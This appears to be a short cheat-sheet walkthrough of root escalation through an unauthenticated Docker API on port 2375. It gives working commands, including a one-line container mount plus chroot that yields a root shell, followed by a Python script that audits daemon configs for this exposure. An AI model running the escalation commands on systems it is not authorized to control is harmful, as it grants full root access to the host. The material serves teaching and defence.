Docker - Escalation of privilege - Misconfigured Docker Socket
- Escalation
Who I am:
whoami
john
List all processes listening on TCP ports
netstat -tlp
Proto Recv-Q Send-Q Local Address    Foreign Address  State   PID/Program name
tcp   0      0      localhost:2375   0.0.0.0:*        LISTEN  -
tcp   0      0      0.0.0.0:ssh      0.0.0.0:*        LISTEN  -
tcp6  0      0      [::]:ssh         [::]:*           LISTEN  -
- Port 2375: Docker API unencrypted
- Port 2376: Docker API encrypted
Check whether the service listening on port 2375 is the Docker API:
curl localhost:2375/version
{"Platform":{"Name":"Docker Engine - Community"}, ...
The Docker client is installed on the machine, and the Docker API is listening on its default unencrypted port, 2375. Configure the Docker client to talk to the daemon over TCP:
export DOCKER_HOST="tcp://localhost:2375"
https://docs.docker.com/engine/reference/commandline/cli/#environment-variables
Start a Container and mount the root of the host machine on a directory of the Container.
docker run -it -v /:/mnt alpine sh
Once inside the container:
chroot /mnt bash
Who I am:
whoami
root
In one line:
docker run -it --rm -v /:/mnt alpine chroot /mnt bash
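
A defender-side check for the misconfiguration shown above, as an added example that is not part of the original page: it reads the daemon's `daemon.json` text and `dockerd` command line and reports every `tcp://` listener that does not require client certificates (`tlsverify`). The function names and the sample configs are constructed for illustration.

```python
import json
import shlex
from urllib.parse import urlparse

LOOPBACK = {"localhost", "127.0.0.1", "::1"}

# Constructed sample configs (not from the page): the weak setup and a hardened one.
WEAK_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2375"]}'
HARDENED_JSON = """{"hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2376"],
 "tlsverify": true, "tlscacert": "/etc/docker/ca.pem",
 "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}"""

def _flag(args, cfg, name):
    """True if a boolean option is set in daemon.json or on the command line."""
    return cfg.get(name) is True or f"--{name}" in args or f"--{name}=true" in args

def audit_dockerd(daemon_json, cmdline):
    """Return one finding per TCP API listener that lacks client-cert auth."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    args = shlex.split(cmdline)
    hosts = list(cfg.get("hosts", []))
    for i, arg in enumerate(args):
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
    tlsverify = _flag(args, cfg, "tlsverify")
    tls_only = _flag(args, cfg, "tls") and not tlsverify
    findings = []
    for host in hosts:
        if not host.startswith("tcp://") or tlsverify:
            continue  # unix:// is governed by file permissions; tlsverify demands a client cert
        name = urlparse(host).hostname or ""
        # A loopback bind still exposes the API to every local account, as on the page.
        scope = "any local user" if name in LOOPBACK else "anyone who can reach the port"
        mode = "encrypted but unauthenticated" if tls_only else "plaintext, unauthenticated"
        findings.append(f"{host}: {mode}; root-equivalent for {scope}")
    return findings

if __name__ == "__main__":
    for label, cfg, cmd in [("weak", WEAK_JSON, "dockerd"),
                            ("hardened", HARDENED_JSON, "dockerd"),
                            ("flags", "", "dockerd -H tcp://0.0.0.0:2375 --tls")]:
        print(label, audit_dockerd(cfg, cmd) or "no findings")
```

The loopback case is reported on purpose: binding the API to localhost keeps remote hosts out but leaves it open to every unprivileged account on the machine.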